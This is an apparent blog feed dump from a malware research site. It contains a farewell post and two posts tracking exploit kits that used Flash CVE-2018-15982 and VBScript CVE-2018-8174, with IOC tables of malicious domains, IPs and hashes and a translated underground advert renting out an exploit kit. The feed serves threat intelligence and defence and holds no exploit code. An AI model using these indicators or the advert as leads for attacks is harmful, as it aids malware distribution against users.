Jekyll2021-02-13T11:50:21+01:00https://malware.dontneedcoffee.com/MDNC | Malware don’t need CoffeeSleep is a symptom of caffeine deprivation.KafeineChoose Again.2020-02-28T14:50:00+01:002020-02-28T14:50:00+01:00https://malware.dontneedcoffee.com/2020/02/ChooseAgain<p>This is the last post/activity you’ll see on MDNC.</p>
<p>I have now chosen to bring the MDNC (Blog/Kafeine/MISP) project to an end.<br />
Thanks to those who helped me during this incredible 8 years journey.<br />
<br />
The blog and twitter account will stay up (but inactive) for the records.<br />
The MDNC MISP instance will be shut down in several weeks.<br />
<br /></p>
<blockquote>
<p>‘Choose again.’ said Aenea.
<cite>‘Dan Simmons, The Rise of Endymion‘</cite></p>
</blockquote>
<p>That’s all Folks!</p>Kafeinehttps://twitter.com/kafeineThis is the last post/activity you’ll see on MDNC. I have now chosen to bring the MDNC (Blog/Kafeine/MISP) project to an end. Thanks to those who helped me during this incredible 8 years journey. The blog and twitter account will stay up (but inactive) for the records. The MDNC MISP instance will be shut down in several weeks. ‘Choose again.’ said Aenea. ‘Dan Simmons, The Rise of Endymion‘ That’s all Folks!CVE-2018-15982 (Flash Player up to 31.0.0.153) and Exploit Kits2019-01-16T14:50:00+01:002019-01-16T14:50:00+01:00https://malware.dontneedcoffee.com/2019/01/CVE-2018-15982<p>The <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15982" title="Mitre CVE-2018-15982">CVE-2018-15982</a> is a bug that allows remote code execution in Flash Player up to 31.0.0.153, spotted in the wild as a 0day. Patched on December 05, 2018 with <a href="https://helpx.adobe.com/security/products/flash-player/apsb18-42.html">APSB18-42</a>.</p>
<h2 id="underminer"><a href="#underminer">Underminer</a>:</h2>
<p><a href="https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/">Underminer exploit kit improves in its latest iteration</a> - 2018-12-21 - Malwarebytes</p>
<h2 id="fallout"><a href="#fallout">Fallout</a>:</h2>
<p>2019-01-16</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-15982/fallout_cve-2018-15982.png" alt="Fallout_CVE-2018-15982" class="center" /></p>
<center><em>Figure 4: Fallout exploiting CVE-2018-15982 on Windows 7 - 2019-01-16 </em></center>
<p>Files: <a href="https://www.virustotal.com/en/file/dfbf61cca208e7a6397c3e5edc14d7fef64ca6c1b31e55a8c41da86c59a30cf2/analysis/">Fiddler on VT</a> - <a href="https://www.virustotal.com/en/file/a96e998297c50b26accb4ce2860e511b76f71c23b022d80fdf9028abae2d10df/analysis/">Pcap on VT</a></p>
<p>Associated Advert underground:</p>
<blockquote>
<p>Итак! Тяжкие работы по восстановлению всей инфраструктуры связки закончены, были проведены тесты и в данный момент связка работает в полном объеме. Также были произведены множество правок и изменений.</p>
<p>Изменения:</p>
<ol>
<li>Увеличена производительность</li>
<li>Полностью переработан механизм обфускации кода и генерации лэндинга.</li>
<li>Убран CVE-2018-8373 на переработку. В данный момент сплоит ведет себя не стабильно.</li>
<li>Добавлен новый флеш сплоит CVE-2018-15982.</li>
<li>Для запуска повершелл в шеллкод добавлен код отключения AMSI</li>
<li>Кучка мелких правок</li>
</ol>
<p>ИЗМЕНЕНА ЦЕНОВАЯ ПОЛИТИКА
Неделя 400$
Месяц 1300$</p>
<p>В данный момент при проверке отстука софта со связки было выявлено:</p>
<ol>
<li>Отстук EXE на уровне 80-90%</li>
<li>Отстук PowerShell на уровне 95-100%</li>
</ol>
</blockquote>
<p>Translated by google as:</p>
<blockquote>
<p>So! The hard work on the restoration of the entire infrastructure of the bundle was completed, tests were carried out and at the moment the bundle is working in full. There have also been many edits and changes.</p>
<p>Changes:</p>
<ol>
<li>Increased performance</li>
<li>The code obfuscation and landing generation mechanism has been completely redesigned.</li>
<li>Removed CVE-2018-8373 for recycling. At the moment, the flow rate is not stable.</li>
<li>Added new flash sploit CVE-2018-15982.</li>
<li>To launch Powershell, the disable code AMSI is added to the shellcode</li>
<li>A bunch of minor edits</li>
</ol>
<p>CHANGED PRICE POLICY
Week 400 $
Month $ 1300</p>
<p>At the moment, when checking the otstuk software from the bundle, it was revealed:</p>
<ol>
<li>Otstuk EXE level 80-90%</li>
<li>Otstuk PowerShell at the level of 95-100%</li>
</ol>
</blockquote>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>payformyattention[.]site|51.15.35[.]154</td>
<td>domain|IP</td>
<td>Fallout EK</td>
<td>2019-01-16</td>
</tr>
<tr>
<td>whereismyteam[.]press|51.15.111[.]159</td>
<td>domain|IP</td>
<td>Fallout EK</td>
<td>2019-01-16</td>
</tr>
<tr>
<td>bd31d8f5f7d0f68222517afc54f85da9d305e63a2ff639c6c535e082de13dede</td>
<td>SHA-256</td>
<td>GandCrab Ransomware</td>
<td>2019-01-16</td>
</tr>
</tbody>
</table>
<h2 id="spelevo"><a href="#spelevo">Spelevo</a>:</h2>
<p>2019-03-06
Appears to be a new Exploit Kit which has some similarities with “SPL EK”. (CVE-2018-8174 has been spotted there as well)</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-15982/spelevo_cve-2018-15982.png" alt="Spelevo_CVE-2018-15982" class="center" /></p>
<center><em>Figure 4: Spelevo exploiting CVE-2018-15982 on Windows 7 - 2019-03-07 </em></center>
<p>Acknowledgement:</p>
<p>Thanks to <a href="https://twitter.com/ring_lcy">Chaoying Liu</a> for CVE confirmation.</p>
<p>Files: <a href="https://www.virustotal.com/en/file/daf734b681bd4814838934decef6d30cea4e7299729aec88641a2ab2f95e42b1/analysis/">Fiddler on VT</a> - <a href="https://www.virustotal.com/en/file/aa29390e35889aea262985088be0ed0c96da78465ce0c43a4f8c05706b6d64dd/analysis/">Pcap on VT</a> (note: Some proxy were used)</p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>letsdoitquick[.]site|194.113.107.71</td>
<td>domain|IP</td>
<td>Redirector (Keitaro TDS)</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>index.microsoft-ticket[.]xyz|85.17.197[.]101</td>
<td>domain|IP</td>
<td>Spelevo EK</td>
<td>2019-03-06</td>
</tr>
<tr>
<td>blasian.bestseedtodo[.]xyz|85.17.197[.]101</td>
<td>domain|IP</td>
<td>Spelevo EK</td>
<td>2019-03-06</td>
</tr>
<tr>
<td>flashticket[.]xyz|85.17.197[.]101</td>
<td>domain|IP</td>
<td>Spelevo EK</td>
<td>2019-03-06</td>
</tr>
<tr>
<td>read.updateversionswf[.]xyz|85.17.197[.]101</td>
<td>domain|IP</td>
<td>Spelevo EK</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>9aa8e341cc895350addaf268b21f7a716f6d7993575fdba67a3fe7a9e23b8f90</td>
<td>SHA-256</td>
<td>Gootkit “1999”</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>2feba3cc47b7f1d47a9e1277c4f4ad5aa5126e59798ac096459d1eae8f573c35</td>
<td>SHA-256</td>
<td>Gootkit “3012” (2nd Stage)</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>ws.blueberryconstruction[.]it|185.158.250[.]163</td>
<td>domain|IP</td>
<td>Gootkit C2</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>ws.diminishedvaluevirginia[.]com|185.158.251[.]115</td>
<td>domain|IP</td>
<td>Gootkit C2</td>
<td>2019-03-07</td>
</tr>
<tr>
<td>gttopr[.]space|198.251.83[.]27</td>
<td>domain|IP</td>
<td>Gootkit C2</td>
<td>2019-03-07</td>
</tr>
</tbody>
</table>
<p><a href="#gf-sundown">GreenFlash Sundown</a>:</p>
<p><a href="https://twitter.com/vigilantbeluga/status/1114216872725995520">19.03.26 #Malvertising -> #GreenFlashSundown EK-> #SeonRansomware ver 0.2 & #pony & #miner using CVE-2018-15982</a> - 2019-04-05 - <a href="https://twitter.com/vigilantbeluga">@vigilantbeluga</a></p>
<p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/shadowgate-returns-to-worldwide-operations-with-evolved-greenflash-sundown-exploit-kit/">Shadowgate Returns to Worldwide Operations With Evolved Greenflash Sundown Exploit Kit</a> - 2019-06-27 - Trendmicro</p>
<p><strong>Read More:</strong><br /></p>
<p><a href="https://atr-blog.gigamon.com/2018/12/05/adobe-flash-zero-day-exploited-in-the-wild/">Adobe Flash Zero-Day Exploited In the Wild</a> - 2018-12-05 - Gigamon<br /></p>
<p><a href="https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/">Underminer exploit kit improves in its latest iteration</a> - 2018-12-21 - Malwarebytes</p>Kafeinehttps://twitter.com/kafeineThe CVE-2018-15982 is a bug that allows remote code execution in Flash Player up to 31.0.0.153, spotted in the wild as a 0day. Patched on December 05, 2018 with APSB18-42. Underminer: Underminer exploit kit improves in its latest iteration - 2018-12-21 - Malwarebytes Fallout: 2019-01-16 Figure 4: Fallout exploiting CVE-2018-15982 on Windows 7 - 2019-01-16 Files: Fiddler on VT - Pcap on VT Associated Advert underground: Итак! Тяжкие работы по восстановлению всей инфраструктуры связки закончены, были проведены тесты и в данный момент связка работает в полном объеме. Также были произведены множество правок и изменений. Изменения: Увеличена производительность Полностью переработан механизм обфускации кода и генерации лэндинга. Убран CVE-2018-8373 на переработку. В данный момент сплоит ведет себя не стабильно. Добавлен новый флеш сплоит CVE-2018-15982. Для запуска повершелл в шеллкод добавлен код отключения AMSI Кучка мелких правок ИЗМЕНЕНА ЦЕНОВАЯ ПОЛИТИКА Неделя 400$ Месяц 1300$ В данный момент при проверке отстука софта со связки было выявлено: Отстук EXE на уровне 80-90% Отстук PowerShell на уровне 95-100% Translated by google as: So! The hard work on the restoration of the entire infrastructure of the bundle was completed, tests were carried out and at the moment the bundle is working in full. There have also been many edits and changes. Changes: Increased performance The code obfuscation and landing generation mechanism has been completely redesigned. Removed CVE-2018-8373 for recycling. At the moment, the flow rate is not stable. Added new flash sploit CVE-2018-15982. To launch Powershell, the disable code AMSI is added to the shellcode A bunch of minor edits CHANGED PRICE POLICY Week 400 $ Month $ 1300 At the moment, when checking the otstuk software from the bundle, it was revealed: Otstuk EXE level 80-90% Otstuk PowerShell at the level of 95-100% IOC Type Comment Date payformyattention[.]site|51.15.35[.]154 domain|IP Fallout EK 2019-01-16 whereismyteam[.]press|51.15.111[.]159 domain|IP Fallout EK 2019-01-16 bd31d8f5f7d0f68222517afc54f85da9d305e63a2ff639c6c535e082de13dede SHA-256 GandCrab Ransomware 2019-01-16 Spelevo: 2019-03-06 Appears to be a new Exploit Kit which has some similarities with “SPL EK”. (CVE-2018-8174 has been spotted there as well) Figure 4: Spelevo exploiting CVE-2018-15982 on Windows 7 - 2019-03-07 Acknowledgement: Thanks to Chaoying Liu for CVE confirmation. Files: Fiddler on VT - Pcap on VT (note: Some proxy were used) IOC Type Comment Date letsdoitquick[.]site|194.113.107.71 domain|IP Redirector (Keitaro TDS) 2019-03-07 index.microsoft-ticket[.]xyz|85.17.197[.]101 domain|IP Spelevo EK 2019-03-06 blasian.bestseedtodo[.]xyz|85.17.197[.]101 domain|IP Spelevo EK 2019-03-06 flashticket[.]xyz|85.17.197[.]101 domain|IP Spelevo EK 2019-03-06 read.updateversionswf[.]xyz|85.17.197[.]101 domain|IP Spelevo EK 2019-03-07 9aa8e341cc895350addaf268b21f7a716f6d7993575fdba67a3fe7a9e23b8f90 SHA-256 Gootkit “1999” 2019-03-07 2feba3cc47b7f1d47a9e1277c4f4ad5aa5126e59798ac096459d1eae8f573c35 SHA-256 Gootkit “3012” (2nd Stage) 2019-03-07 ws.blueberryconstruction[.]it|185.158.250[.]163 domain|IP Gootkit C2 2019-03-07 ws.diminishedvaluevirginia[.]com|185.158.251[.]115 domain|IP Gootkit C2 2019-03-07 gttopr[.]space|198.251.83[.]27 domain|IP Gootkit C2 2019-03-07 GreenFlash Sundown: 19.03.26 #Malvertising -> #GreenFlashSundown EK-> #SeonRansomware ver 0.2 & #pony & #miner using CVE-2018-15982 - 2019-04-05 - @vigilantbeluga Shadowgate Returns to Worldwide Operations With Evolved Greenflash Sundown Exploit Kit - 2019-06-27 - Trendmicro Read More: Adobe Flash Zero-Day Exploited In the Wild - 2018-12-05 - Gigamon Underminer exploit kit improves in its latest iteration - 2018-12-21 - MalwarebytesCVE-2018-8174 (VBScript Engine) and Exploit Kits2018-05-25T07:50:00+02:002018-05-25T07:50:00+02:00https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174<p>The <a href="http://cve.circl.lu/cve/CVE-2018-8174" title="Circl.lu CVE-2018-8174">CVE-2018-8174</a> is a bug that allows remote code execution in the VBScript Engine. Found exploited in the wild as a 0day via Word documents, <a href="https://weibo.com/ttarticle/p/show?id=2309404230886689265523" title="新型Office攻击使用浏览器“双杀”漏洞">announced by Qihoo360 on April 20, 2018</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174" title="CVE-2018-8174 | Windows VBScript Engine Remote Code Execution Vulnerability">patched by Microsoft</a> on May 8, 2018 and explained in details by <a href="https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/" title="The King is dead. Long live the King!
Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174">Kaspersky</a> the day after.</p>
<p>A Proof of Concept for Internet Explorer 11 on Windows 7 has been <a href="https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript">shared publicly 3 days ago</a>, it’s now beeing integrated in Browser Exploit Kits.</p>
<p>This will replace <a href="https://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a> from july 2016 and might shake the Drive-By landscape for the coming months.</p>
<h2 id="rig"><a href="#rig">RIG</a>:</h2>
<p><em>Spotted on the 2018-05-25</em></p>
<p>“TakeThat” wrote yesterday (2018-05-24) that he has integrated it and that infection rate has increased:</p>
<p>Добавлен CVE-2018-8174<br />
Add CVE-2018-8174<br />
Пробив/rate + <img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/boom.gif" alt="boom.gif" /><br />
[redacted]@exploit.im<br />
[redacted]@xmpp.jp<br /></p>
<p>And indeed today:</p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/rig_cve-2018-8174.png" alt="RIG_CVE-2018-8174" class="center" /></p>
<center><em>Figure 1: RIG launching code exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-05-25 </em></center>
<p><br /></p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>206.189.147.254</td>
<td>IP</td>
<td>Redirector</td>
<td>2018-05-23</td>
</tr>
<tr>
<td>95.142.40.187</td>
<td>IP</td>
<td>RIG</td>
<td>2018-05-24</td>
</tr>
<tr>
<td>95.142.40.185</td>
<td>IP</td>
<td>RIG</td>
<td>2018-05-24</td>
</tr>
<tr>
<td>95.142.40.184</td>
<td>IP</td>
<td>RIG</td>
<td>2018-05-24</td>
</tr>
<tr>
<td>46.30.42.164</td>
<td>IP</td>
<td>RIG</td>
<td>2018-05-24</td>
</tr>
<tr>
<td>vnz[.]bit|104.239.213[.]7</td>
<td>domain|IP</td>
<td>Smoke Bot C2</td>
<td>2018-05-25</td>
</tr>
<tr>
<td>vnz2107[.]ru|104.239.213[.]7</td>
<td>domain|IP</td>
<td>Smoke Bot C2</td>
<td>2018-05-25</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/eeaa1ff2e9d33573590a8acb63cc8e6f390c0b056ff709e2945bf375d5ac5003/analysis/">92e7cfc803ff73ed14c6bf7384834a09</a></td>
<td>md5</td>
<td>Smoke Bot</td>
<td>2018-05-25</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/21062145f36a21cd7d8de7066f18be71f3f5bb16b1347c6d1f1065f627744fe4/analysis/">58648ed843655d63570f8809ec2d6b26</a></td>
<td>md5</td>
<td>Extracted VBS</td>
<td>2018-05-25</td>
</tr>
</tbody>
</table>
<p>Files: <a href="https://www.virustotal.com/#/file/57281640e8ed514803a1c47c4ecb4e14462795b02308511d154b56d33e57ec00/detection">PCAP on VT</a></p>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to <a href="https://twitter.com/node5">William Metcalf</a> and Frank Ruiz (FoxIT InTELL) for their help.</li>
</ul>
<h2 id="magnitude"><a href="#magnitude">Magnitude</a>:</h2>
<p><em>Spotted on the 2018-06-02</em></p>
<p>After a week without buying traffic, Magnitude is active again, now with CVE-2018-8174:
<img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/magnitude_cve-2018-8174.png" alt="Magnitude_CVE-2018-8174" class="center" /></p>
<center><em>Figure 2: Magnitude successfully exploiting CVE-2018-8174 against IE11 on Windows 7 to deploy Magniber Ransomware - 2018-06-02 </em></center>
<p>Note: Magniber is back (after 1 month and half of GandCrab) in this infection chain and is now (as GandCrab) also accepting Dash cryptocurrency as payment</p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>taxhuge[.]com|149.56.159.203</td>
<td>Domain|IP</td>
<td>Magnigate step 1</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>69j366ma35.fedpart[.]website|167.114.33.110</td>
<td>Domain|IP</td>
<td>Magnigate step 2</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>a23e5cwd602oe46d.addrole[.]space|167.114.191.124</td>
<td>Domain|IP</td>
<td>Magnitude</td>
<td>2018-06-02</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/5990f09396ff018600f022e621921909bea8ea823398bd10dbade4f27b59e12f/analysis/">f48a248ddec2b7987778203f2f6a11b1</a></td>
<td>md5</td>
<td>Extracted VBS</td>
<td>2018-06-02</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/24d17158531180849f5b0819ac965d796886b8238d8a690e2a7ecb3d7fd3bf2b/analysis/">30bddd0ef9f9f178aa39599f0e49d733</a></td>
<td>md5</td>
<td>Magniber</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>[ID].bitslot[.]website|139.60.161.51</td>
<td>Domain|IP</td>
<td>Magniber Payment Server</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>[ID].carefly[.]space|54.37.57.152</td>
<td>Domain|IP</td>
<td>Magniber Payment Server</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>[ID].trapgo[.]host|185.244.150.110</td>
<td>Domain|IP</td>
<td>Magniber Payment Server</td>
<td>2018-06-02</td>
</tr>
<tr>
<td>[ID].farmand[.]site|64.188.10.44</td>
<td>Domain|IP</td>
<td>Magniber Payment Server</td>
<td>2018-06-02</td>
</tr>
</tbody>
</table>
<p>Files: <a href="https://www.virustotal.com/#/file/1e5d0903198baac5eb213d290dd2c53124685de250ad18b709a6e83b826cdc69/detection">Fiddler on VT</a> <em>(note: some proxy were used)</em></p>
<h2 id="grandsoft"><a href="#grandsoft">GrandSoft</a>:</h2>
<p><em>Spotted by <a href="https://twitter.com/jspchc">Joseph Chen</a> on 2018-06-14</em></p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/grandsoft_cve-2018-8174.png" alt="GrandSoft_CVE-2018-8174" class="center" /></p>
<center><em>Figure 3: GrandSoft exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-06-14 </em></center>
<p><br /></p>
<p>Files: <a href="https://www.virustotal.com/#/file/b9847896178e810f9b51b07a89a78b88d5b651a629ca8c1290df57eada788937/detection">Fiddler on VT</a> - <a href="https://www.virustotal.com/#/file/9bec88033de8f4d913a6674168faf124ec5bb47216d15a42a7293e47c54ff7ff/detection">Pcap on VT</a></p>
<table>
<thead>
<tr>
<th>IOC</th>
<th>Type</th>
<th>Comment</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>easternflow[.]ml|200.74.240.219</td>
<td>Domain|IP</td>
<td>BlackTDS</td>
<td>2018-06-14</td>
</tr>
<tr>
<td>uafcriminality[.]lesbianssahgbrewingqzw[.]xyz|185.17.122.212</td>
<td>Domain|IP</td>
<td>GrandSoft EK</td>
<td>2018-06-14</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/69ec63646a589127c573fed9498a11d3e75009751ac5e16a80e7aa684ad66240/analysis/">cec253acd39fe5d920c7da485e367104</a></td>
<td>md5</td>
<td>Undefined Loader</td>
<td>2018-06-14</td>
</tr>
<tr>
<td><a href="https://www.virustotal.com/en/file/f75c442895e7b8c005d420759dfcd4414ac037cf6bdd5771e23cedd73693a075/analysis/">a15d9257a0c1421353edd31798f03cd6</a></td>
<td>md5</td>
<td>GandCrab</td>
<td>2018-06-14</td>
</tr>
<tr>
<td>91.210.104.247</td>
<td>IP</td>
<td>AscentorLoader C2</td>
<td>2018-06-14</td>
</tr>
<tr>
<td>carder[.]bit</td>
<td>Domain</td>
<td>GandCrab C2</td>
<td>2018-06-14</td>
</tr>
<tr>
<td>ransomware[.]bit</td>
<td>Domain</td>
<td>GandCrab C2</td>
<td>2018-06-14</td>
</tr>
</tbody>
</table>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to <a href="https://twitter.com/jspchc">Joseph Chen</a> who spotted the new exploit and allowed the capture of this traffic.</li>
</ul>
<p><strong>Edits:</strong><br /></p>
<ul>
<li>2018-06-19 - Added the name for the Loader <br /></li>
</ul>
<h2 id="fallout"><a href="#fallout">Fallout</a>:</h2>
<p><em>Spotted on 2018-06-30, most probably there since 2018-06-16</em></p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/fallout_cve-2018-8174.png" alt="Fallout_CVE-2018-8174" class="center" /></p>
<center><em>Figure 4: Fallout exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-08-30 </em></center>
<p>Files: <a href="https://www.virustotal.com/en/file/5202d382cb8e629a037e33117883dc4f44996b9f17ac774e18e7b0152e526eea/analysis/">Fiddler on VT</a> - <a href="https://www.virustotal.com/en/file/54fa6d37f97e65cc62d96a5f0c2e3de9f32f2c0b2b2bbb7bc51f4d2f1e07b206/analysis/">Pcap on VT</a></p>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to <a href="https://twitter.com/nao_sec">Nao_Sec</a> for the initial referer. Thanks to <a href="https://twitter.com/jspchc">Joseph Chen</a> for additionnal inputs</li>
</ul>
<h2 id="kaixin-ek"><a href="#kaixin">Kaixin EK</a>:</h2>
<p><em>Spotted by <a href="https://twitter.com/wugeej/status/1017208092482625536">JayK</a> on 2018-07-12</em></p>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/kaixin_cve-2018-8174.png" alt="Kaixin_CVE-2018-8174" class="center" /></p>
<center><em>Figure 5: Kaixin exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-08-11 </em></center>
<p>Files: <a href="https://www.virustotal.com/en/file/fc46d7d51778396261eae02f11eaddce18c97aab9ef8227547094023ee58d3cf/analysis/">Fiddler on VT</a> - <a href="https://www.virustotal.com/en/file/d442c4c9e0911de27f28c0d06565c1790460b832e7439233ebd0b5526eb9f801/analysis/">Pcap on VT</a></p>
<h2 id="hunter-ek"><a href="#hunter">Hunter EK</a>:</h2>
<p><img src="https://malware.dontneedcoffee.com/images/blog/CVE-2018-8174/hunter_cve-2018-8174.png" alt="Hunter_CVE-2018-8174" class="center" /></p>
<center><em>Figure 6: Hunter including CVE-2018-8174 in its carpet bombing against IE11 on Windows 7 - 2018-08-30 </em></center>
<p>Files: <a href="https://www.virustotal.com/en/file/cc9e0347ae679b9d15d2138bff532cd27edae2b4e171d6b0a46c09adc5aaed19/analysis/">Fiddler on VT</a></p>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to Frank Ruiz (FoxIT InTELL) for allowing this capture.</li>
</ul>
<h2 id="greenflash-sundown"><a href="#sundown-gf">Greenflash Sundown</a>:</h2>
<p><em>Spotted by <a href="https://twitter.com/ring_lcy">Chaoying Liu</a> on 2018-09-05</em></p>
<p><strong>Acknowledgement:</strong><br /></p>
<ul>
<li>Thanks to <a href="https://twitter.com/ring_lcy">Chaoying Liu</a> for the CVE identification.</li>
</ul>
<p><strong>Read More:</strong><br />
<a href="https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/">The King is dead. Long live the King!</a> - 2018-05-09 - SecureList<br />
<a href="http://blogs.360.cn/blog/cve-2018-8174-en/">Analysis of CVE-2018-8174 VBScript 0day</a> - 2018-05-09 - Qihoo360<br /></p>
<p><strong>Post publication reading:</strong><br />
<a href="https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/">Rig Exploit Kit Now Using CVE-2018-8174 to Deliver Monero Miner</a> - 2018-05-31 - Trend Micro<br />
<a href="https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/">Delving deep into VBScript - Analysis of CVE-2018-8174 exploitation</a> - 2018-07-03 - SecureList<br />
<a href="https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a> - 2018-09-01 - <a href="https://twitter.com/nao_sec">Nao_Sec</a><br /></p>Kafeinehttps://twitter.com/kafeineThe CVE-2018-8174 is a bug that allows remote code execution in the VBScript Engine. Found exploited in the wild as a 0day via Word documents, announced by Qihoo360 on April 20, 2018, patched by Microsoft on May 8, 2018 and explained in details by Kaspersky the day after. A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now beeing integrated in Browser Exploit Kits. This will replace CVE-2016-0189 from july 2016 and might shake the Drive-By landscape for the coming months. RIG: Spotted on the 2018-05-25 “TakeThat” wrote yesterday (2018-05-24) that he has integrated it and that infection rate has increased: Добавлен CVE-2018-8174 Add CVE-2018-8174 Пробив/rate + [redacted]@exploit.im [redacted]@xmpp.jp And indeed today: Figure 1: RIG launching code exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-05-25 IOC Type Comment Date 206.189.147.254 IP Redirector 2018-05-23 95.142.40.187 IP RIG 2018-05-24 95.142.40.185 IP RIG 2018-05-24 95.142.40.184 IP RIG 2018-05-24 46.30.42.164 IP RIG 2018-05-24 vnz[.]bit|104.239.213[.]7 domain|IP Smoke Bot C2 2018-05-25 vnz2107[.]ru|104.239.213[.]7 domain|IP Smoke Bot C2 2018-05-25 92e7cfc803ff73ed14c6bf7384834a09 md5 Smoke Bot 2018-05-25 58648ed843655d63570f8809ec2d6b26 md5 Extracted VBS 2018-05-25 Files: PCAP on VT Acknowledgement: Thanks to William Metcalf and Frank Ruiz (FoxIT InTELL) for their help. Magnitude: Spotted on the 2018-06-02 After a week without buying traffic, Magnitude is active again, now with CVE-2018-8174: Figure 2: Magnitude successfully exploiting CVE-2018-8174 against IE11 on Windows 7 to deploy Magniber Ransomware - 2018-06-02 Note: Magniber is back (after 1 month and half of GandCrab) in this infection chain and is now (as GandCrab) also accepting Dash cryptocurrency as payment IOC Type Comment Date taxhuge[.]com|149.56.159.203 Domain|IP Magnigate step 1 2018-06-02 69j366ma35.fedpart[.]website|167.114.33.110 Domain|IP Magnigate step 2 2018-06-02 a23e5cwd602oe46d.addrole[.]space|167.114.191.124 Domain|IP Magnitude 2018-06-02 f48a248ddec2b7987778203f2f6a11b1 md5 Extracted VBS 2018-06-02 30bddd0ef9f9f178aa39599f0e49d733 md5 Magniber 2018-06-02 [ID].bitslot[.]website|139.60.161.51 Domain|IP Magniber Payment Server 2018-06-02 [ID].carefly[.]space|54.37.57.152 Domain|IP Magniber Payment Server 2018-06-02 [ID].trapgo[.]host|185.244.150.110 Domain|IP Magniber Payment Server 2018-06-02 [ID].farmand[.]site|64.188.10.44 Domain|IP Magniber Payment Server 2018-06-02 Files: Fiddler on VT (note: some proxy were used) GrandSoft: Spotted by Joseph Chen on 2018-06-14 Figure 3: GrandSoft exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-06-14 Files: Fiddler on VT - Pcap on VT IOC Type Comment Date easternflow[.]ml|200.74.240.219 Domain|IP BlackTDS 2018-06-14 uafcriminality[.]lesbianssahgbrewingqzw[.]xyz|185.17.122.212 Domain|IP GrandSoft EK 2018-06-14 cec253acd39fe5d920c7da485e367104 md5 Undefined Loader 2018-06-14 a15d9257a0c1421353edd31798f03cd6 md5 GandCrab 2018-06-14 91.210.104.247 IP AscentorLoader C2 2018-06-14 carder[.]bit Domain GandCrab C2 2018-06-14 ransomware[.]bit Domain GandCrab C2 2018-06-14 Acknowledgement: Thanks to Joseph Chen who spotted the new exploit and allowed the capture of this traffic. Edits: 2018-06-19 - Added the name for the Loader Fallout: Spotted on 2018-06-30, most probably there since 2018-06-16 Figure 4: Fallout exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-08-30 Files: Fiddler on VT - Pcap on VT Acknowledgement: Thanks to Nao_Sec for the initial referer. Thanks to Joseph Chen for additionnal inputs Kaixin EK: Spotted by JayK on 2018-07-12 Figure 5: Kaixin exploiting CVE-2018-8174 against IE11 on Windows 7 - 2018-08-11 Files: Fiddler on VT - Pcap on VT Hunter EK: Figure 6: Hunter including CVE-2018-8174 in its carpet bombing against IE11 on Windows 7 - 2018-08-30 Files: Fiddler on VT Acknowledgement: Thanks to Frank Ruiz (FoxIT InTELL) for allowing this capture. Greenflash Sundown: Spotted by Chaoying Liu on 2018-09-05 Acknowledgement: Thanks to Chaoying Liu for the CVE identification. Read More: The King is dead. Long live the King! - 2018-05-09 - SecureList Analysis of CVE-2018-8174 VBScript 0day - 2018-05-09 - 